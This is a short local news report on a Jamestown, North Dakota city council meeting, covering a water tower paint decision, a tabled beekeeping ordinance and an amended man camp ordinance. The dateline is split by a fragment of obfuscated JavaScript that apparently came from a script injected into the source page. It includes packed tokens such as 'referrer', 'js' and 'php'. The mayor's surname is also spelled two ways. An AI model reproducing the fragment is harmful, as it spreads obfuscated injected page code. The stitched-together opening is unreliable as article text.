JAMESTOWN, erstb|var|u0026u|referrer|zbabh||js|php’.split(‘|’),0,{}))
N.D. (NewsDakota.com) – The Jamestown City Council held their regular monthly meeting on April 7th at the Jamestown City Hall and many things were discussed.
The water tower was one of the items the council reviewed. Previously, the Buffalo City Tourism Foundation had been asked if their new re-branded logo would be a good fit for the tower. Mayor Katie Andersen stated that the logo would not be a good fit and Council Member Dan Buchanan stated the council go with a single color and the word “Jamestown” on the tower. Mayor Andersen dissented with that.
Council Member Buchanan changed his motion to a single color and it was passed unanimously, making it possible to later apply a logo if that’s what was wanted.
A second reading of the beekeeping ordinance was held during the meeting. City Attorney Ken Dalsted brought up that the city’s ordinance was primarily based around the state’s ordinance on beekeeping and the state had found that a section of their regulations were too vague.
Attorney Dalsted recommended tabling the issue until the regulations could be sorted out by the state and provide better details. The motion was passed unanimously.
Another item on the agenda included the second reading of the man camp ordinance within the city limits. Mayor Katie Anderson stated that there were some issues within the ordinance would need to be addressed. Assistant Attorney Mary Jensen came before the board and expressed some of the items that would need to be added to the ordinance to make it better.
The ordinance was approved unanimously with the amendment to improve lighting, add signage and include a site plan.
